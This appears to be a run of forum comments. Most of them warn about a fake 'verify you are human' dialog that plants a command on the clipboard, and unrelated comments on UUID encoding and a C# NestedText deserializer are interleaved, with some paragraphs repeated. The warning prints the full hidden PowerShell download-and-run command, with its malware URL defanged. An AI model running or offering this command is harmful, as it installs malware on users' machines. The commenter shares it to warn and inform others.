Interesting bit starts around 0:32 (ain't nobody got time for this, right?)
This shows how malware pops up a dialog to "verify you are human"; something we've all seen in various different permutations. Sometimes we need to click all stoplights, sometimes we need to do a simple math problem or decipher hard to read text. This time you're being asked to enter a key combination (Win+R, then CTRL+V then Enter) which will paste a command that downloads and installs malware. The command has been sneakily put on the clipboard just earlier by the website.
This downloads malware from https:\\qq51f.short.gy/1 which redirects to https:\\bestiamos.com/91.brr which is then saved as c:\users\public\3aw.msi and run.
(Url's are made invalid by replacing // with \\ deliberately)
You could simply base32, base36 or base64 encode the UUID's (as an example).
Other than that; in IE6 times URL's had a limitation of 1K or 4K or something around that lenght IIRC, so unless you're using dozens of UUID's in a URL this hasn't been a problem for ages.
I can see this work perfectly fine in typed languages like C#: `NestedText.Deserialize<T>("nestedtext")` where the deserialize method handles the actual mapping of nested text objects to `T` by providing the deserializer a class / classes that handles the string -> scalar(s) mapping for the given T. That would, sort of, function as a Schema.
I think the only thing, from glancing over the project, that would need to be supported to make this really useful is nested lists/dictionaries. I don't see how this can be done but maybe I'm missing it.
This shows how malware pops up a dialog to "verify you are human"; something we've all seen in various different permutations. Sometimes we need to click all stoplights, sometimes we need to do a simple math problem or decipher hard to read text. This time you're being asked to enter a key combination (Win+R, then CTRL+V then Enter) which will paste a command that downloads and installs malware. The command has been sneakily put on the clipboard just earlier by the website.
The command (DON'T RUN THIS) is as follows:
cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\3aw.msi'; Invoke-RestMethod -Uri 'https:\\qq51f.short.gy/1' -OutFile $path; Start-Process $path;
This downloads malware from https:\\qq51f.short.gy/1 which redirects to https:\\bestiamos.com/91.brr which is then saved as c:\users\public\3aw.msi and run.
(Url's are made invalid by replacing // with \\ deliberately)
First mention I could find was feb. 18th: https://any.run/report/e9af23d9fde13156ade19368fd8c2766fe8f1...
Maybe this is as old as Rome, but for me it's a first.